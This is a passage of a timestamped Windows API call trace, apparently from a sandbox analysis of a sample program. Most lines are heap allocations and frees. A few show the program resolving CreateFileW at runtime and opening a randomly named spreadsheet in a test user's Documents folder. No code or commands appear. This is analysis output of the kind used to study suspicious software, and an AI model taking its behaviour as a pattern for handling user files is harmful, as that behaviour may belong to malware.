dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0078.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0078.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.153] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0078.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0078.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0078.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.158] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0078.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0078.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca6b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0078.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.158] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0078.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0078.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0078.159] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\WfOLKWjF.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\wfolkwjf.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0078.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.161] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0078.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.163] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.163] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: 